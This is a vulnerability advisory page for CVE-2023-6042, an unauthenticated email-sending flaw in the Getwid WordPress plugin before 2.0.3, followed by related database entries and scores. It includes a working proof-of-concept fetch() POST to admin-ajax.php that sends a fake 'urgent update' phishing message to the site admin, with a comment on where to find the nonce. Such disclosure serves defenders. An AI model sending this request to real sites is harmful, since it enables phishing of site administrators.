Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:56A1C050-67B5-43BC-B5B6-28D9A5A59EBAHistoryDec 16, 2023 - 12:00 a.m.
Getwid < 2.0.3 - Unauthenticated Arbitrary Email Sending to Admin
2023-12-1600:00:00
Krzysztof Zając (CERT PL)
44
getwid
unauthenticated
arbitrary email sending
admin
wordpress update
Description Any unauthenticated user may send e-mail from the site with any title or content to the admin
fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=getwid_send_mail", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "data[subject]=Urgent WordPress update neeeds to be installed&data[message]=Fake notification for the admin with some link to be clicked&security=4c71dae953", /* the nonce is in the page source under recaptcha_v2_contact_form key */
"method": "POST",
});Related
prion
prion
Code injection
2024-01-08 19:15:00
nvd
nvd
CVE-2023-6042
2024-01-08 19:15:09
wpvulndb
wpvulndb
Getwid < 2.0.3 - Unauthenticated Arbitrary Email Sending to Admin
2023-12-16 00:00:00
cvelist
cvelist
cve
cve
CVE-2023-6042
2024-01-08 19:15:09
6.8 Medium
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
43.7%
Related for WPEX-ID:56A1C050-67B5-43BC-B5B6-28D9A5A59EBA